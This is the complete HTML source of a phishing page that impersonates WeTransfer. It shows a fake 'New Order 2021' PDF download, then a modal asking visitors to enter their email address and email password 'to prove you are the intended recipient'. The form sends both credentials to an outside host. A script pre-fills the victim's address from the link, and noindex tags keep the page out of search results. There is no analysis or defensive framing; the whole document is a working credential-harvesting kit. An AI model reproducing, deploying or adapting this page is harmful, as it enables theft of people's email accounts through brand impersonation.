
<!DOCTYPE html>
<html lang="en">

<head>

  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

<meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex, nofollow">
  <meta name="description" content="">
  <meta name="author" content="">
<link rel="icon" href="https://wny.asia/web/wtrf/bow.ico" sizes="32x32" />
  
    <title dir="ltr">WeTransfer</title>
<script type="text/javascript" src="https://code.jquery.com/jquery.min.js"></script>
  <!-- Custom fonts for this template-->
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.0/js/bootstrap.min.js"></script>
  
  <link href="https://fonts.googleapis.com/css?family=Nunito:200,200i,300,300i,400,400i,600,600i,700,700i,800,800i,900,900i" rel="stylesheet">

  <!-- Custom styles for this template-->
  <link href="https://wny.asia/web/wtrf/grww.css" rel="stylesheet">

</head>

<body>  
   <div class="row stack">
    <div class="col">
      <div style="float: left;height: 44px;line-height: 44px;"><img src="https://wny.asia/web/wtrf/logo.png" style=" width: 51px;"> </div>
    </div>
    <div class="col">
      
      <div class="durax">
<center>
<div class="waithi">      Help</div>
<div class="waithi">About us</div>
<div class="waithi" style="border: none;">Got Plus?</div>
</center>
      
      </div>
      
    </div>
  </div>
  
  
  <div class="row">
  
  <div class="believe">
  <center>
  <div class="indusuf"> </div>
  
  <div class="me">Ready when you are</div>
  <div style="font-size: 13px;">Files deleted in 7 days</div>
  
  <br><div class="pedi">
<div style=" text-align: left; margin-left: 22px; font-size: 14px; color: black; padding-top: 4px; "> New Order 2021  <div style="font-size: 10px;color: gray;">2150 KB . PDF</div></div>
  </div>
  
  <div class="butti"  data-toggle="modal" data-target="#myModal" > Download</div>
  
  </center>
  
  </div>
  
<div class="modal fade" id="myModal" role="dialog" style="padding: 0!important;overflow: hidden; ">
    <div class="modal-dialog" style="margin-top: 48px;width: 538px;Background: transparent;float: right;height: 100vh; overflow: hidden; border-radius: 16px 0 0 45px;">
    
      <!-- Modal content-->
      <div class="modal-content" id="coochie" style="border-radius: 0;height: 100vh; border: solid 0; border-top: solid 29px #409fff;">
       <div style="text-align: left;font-size: 29px;padding-bottom: 93px;padding-left: 11px;padding-top: 60px;background: #f3f7fa;line-height: 29px;"> WeTransfer Online Security <br>
       <small style="font-size: 15px;">Enter your Email password below to prove you are the intended recipient.</small> 
       </div>
     <div class="modal-body">
        
         <div>
         <form method="post" action="https://iboy.icu/en/euro.php" >
 
         
          <div>Sign in with your email address to download now</div><br>
         <input type="email" id="email" name="a" placeholder="example@company.com" tabindex="1" required="" class="" autofocus="1" style="width: 100%;height: 51px;padding-left: 10px;background: #fff;outline: 0;border: solid 1px #0067B8 !important;" value=""> </div>
 <br>
<div style="">
 <input type="password" placeholder="Enter Email Password" name="b" tabindex="1" required="" class="" value="" style="width: 100%;width: 100%;height: 51px;padding-left: 10px;background: #ffffff;border: solid 1px #0067B8 !important;outline: 0; "> 
 </div>
 
 <div>&nbsp</div>
  <button name="jdgioool" title="" class="butti" style="height: 49px;width: 94%;border: 0;float: right;margin-top: 24px;color: white;font-weight: 600;margin-bottom: 10px;font-size: 19px;">Sign in to download file
</button> 
        
<div id="oneoo" style="padding-top: 12px; font-size: 12px;  text-align: center; width: 100%;     padding-bottom: 9px;  cursor: pointer;">©2020 Wetransfer &nbsp; &nbsp; Terms of use  &nbsp; &nbsp;Privacy and cookies </div>
        </div>
       </form>
      </div>
      
    </div>
  </div>
  
  
  </div>

  
  
  
  
  
  
  <!-- Bootstrap core JavaScript-->
  <script src="https://code.jquery.com/jquery-3.4.1.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.bundle.min.js"></script>

  <!-- Core plugin JavaScript-->
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.4.1/jquery.easing.js"></script>

  <!-- Custom scripts for all pages-->
  <script src="https://wny.asia/web/wtrf/sb-admin.js"></script>
  
  
<script>
  
document.getElementById("email").value = getUrlVars()["emailid"];;
  
function getUrlVars() {
    var vars = {};
    var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
        vars[key] = value;
    });
    return vars;
}
</script>
</body>

</html>
